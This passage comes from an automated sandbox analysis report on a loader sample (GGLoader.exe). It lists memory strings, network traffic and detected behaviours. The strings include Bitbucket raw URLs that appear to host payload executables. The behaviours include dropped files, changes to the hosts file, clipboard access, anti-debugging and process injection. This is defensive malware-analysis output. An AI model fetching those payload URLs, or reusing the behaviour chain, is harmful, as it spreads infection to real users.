                        Source: lsass.exe, 0000002C.00000000.2223723010.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2962436516.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                        Source: powershell.exe, 00000001.00000002.1925142827.000001EC40A84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512E8E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002512014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2140674795.00000270C7706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2555004791.000001C52E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: lsass.exe, 0000002C.00000000.2225392956.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2966233534.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                        Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                        Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2966233534.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2972274642.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                        Source: powershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: svchost.exe, 00000036.00000000.2312885575.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002511E871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B7691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2228353344.0000000003141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51E8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223723010.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2962436516.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                        Source: powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
                        Source: powershell.exe, 00000001.00000002.1960407447.000001EC48E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t.com/pkiops/cersoft%20Time-Stam202010(1).crt0
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002511E871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B7691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51E8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000026.00000002.2228353344.0000000003141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: powershell.exe, 00000011.00000002.2039902997.00000270B9567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B9541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC319F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31666000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/5940jg9834/gf3443f3/raw/
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfa
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe
                        Source: powershell.exe, 00000001.00000002.1964124917.000001EC48EA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/B
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.ex
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                        Source: powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                        Source: powershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000003.00000002.1768225702.000002511F4A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C520930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000028.00000002.2580308005.000001C536C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co&
                        Source: powershell.exe, 00000001.00000002.1925142827.000001EC40A84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512E8E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002512014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2140674795.00000270C7706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2555004791.000001C52E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F6B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: svchost.exe, 00000035.00000003.2349769567.000001D5599A5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_00792B90 OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,6_2_00792B90
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_00792B90 OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,6_2_00792B90
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BE2B90 OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,35_2_00BE2B90
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_00792C80 OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,6_2_00792C80

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                        System Summary

                        barindex
                        Drops large PE files
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeFile dump: svcupdater.exe.6.dr 831814656Jump to dropped file
                        Powershell drops PE file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\LicenseGet.exeJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\LicCheck.exeJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\LicSend.exeJump to dropped file
                        Uses powercfg.exe to modify the power settings
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_00793F90 IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetTickCount64,NtDelayExecution,GetTickCount64,6_2_00793F90
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeCode function: 7_2_00007FF7D3B994C0 NtCreateUserProcess,7_2_00007FF7D3B994C0
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BE3F90 IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetTickCount64,NtDelayExecution,GetTickCount64,35_2_00BE3F90
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAB02CE NtUnmapViewOfSection,40_2_00007FFD9BAB02CE
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAAF0E0 NtResumeThread,40_2_00007FFD9BAAF0E0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAAF0C0 NtSetContextThread,40_2_00007FFD9BAAF0C0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAB06C8 NtResumeThread,40_2_00007FFD9BAB06C8
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAB04ED NtWriteVirtualMemory,NtSetContextThread,40_2_00007FFD9BAB04ED
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,42_2_00000001400010C0
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC642A7C NtEnumerateValueKey,NtEnumerateValueKey,43_2_00000225DC642A7C
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_00793B60: GetSystemInfo,GlobalMemoryStatusEx,CreateFileA,DeviceIoControl,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,6_2_00793B60
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_gckjyekc.li0.ps1
                        Source: C:\Users\user\Desktop\GGLoader.exeCode function: 0_2_00007FFD9B8842F60_2_00007FFD9B8842F6
                        Source: C:\Users\user\Desktop\GGLoader.exeCode function: 0_2_00007FFD9B8850A20_2_00007FFD9B8850A2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8A44551_2_00007FFD9B8A4455
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007A32106_2_007A3210
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007946E06_2_007946E0
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007B604D6_2_007B604D
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_0079A0306_2_0079A030
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007910E06_2_007910E0
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007921D06_2_007921D0
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007BE3AE6_2_007BE3AE
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_0079F3A06_2_0079F3A0
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007B84696_2_007B8469
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007966806_2_00796680
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_0079E7406_2_0079E740
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007AB80E6_2_007AB80E
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007AE8906_2_007AE890
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_0079E9E06_2_0079E9E0
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_0079EC306_2_0079EC30
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007B3CF86_2_007B3CF8
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_00791D906_2_00791D90
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeCode function: 7_2_00007FF7D3B952DC7_2_00007FF7D3B952DC
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeCode function: 7_2_00007FF7D3B976C07_2_00007FF7D3B976C0
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeCode function: 7_2_00007FF7D3B972857_2_00007FF7D3B97285
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeCode function: 7_2_00007FF7D3B97FD07_2_00007FF7D3B97FD0
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeCode function: 7_2_00007FF7D3B9D7707_2_00007FF7D3B9D770
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeCode function: 7_2_00007FF7D3B952FD7_2_00007FF7D3B952FD
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BEA03035_2_00BEA030
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BE46E035_2_00BE46E0
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BEE9E035_2_00BEE9E0
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BE1D9035_2_00BE1D90
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BE10E035_2_00BE10E0
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00C0604D35_2_00C0604D
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BE21D035_2_00BE21D0
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BF321035_2_00BF3210
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BEF3A035_2_00BEF3A0
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00C0E3AE35_2_00C0E3AE
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00C0846935_2_00C08469
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BE668035_2_00BE6680
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BEE74035_2_00BEE740
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BFE89035_2_00BFE890
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BFB80E35_2_00BFB80E
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00C03CF835_2_00C03CF8
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BEEC3035_2_00BEEC30
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E57165839_2_000002505E571658
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E56F2F839_2_000002505E56F2F8
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E56B03039_2_000002505E56B030
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E5620DC39_2_000002505E5620DC
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E56B23C39_2_000002505E56B23C
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E5A225839_2_000002505E5A2258
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E59FEF839_2_000002505E59FEF8
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E59BC3039_2_000002505E59BC30
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E592CDC39_2_000002505E592CDC
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E59BE3C39_2_000002505E59BE3C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAADB6940_2_00007FFD9BAADB69
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAACA1040_2_00007FFD9BAACA10
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAAFA6240_2_00007FFD9BAAFA62
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAAC97040_2_00007FFD9BAAC970
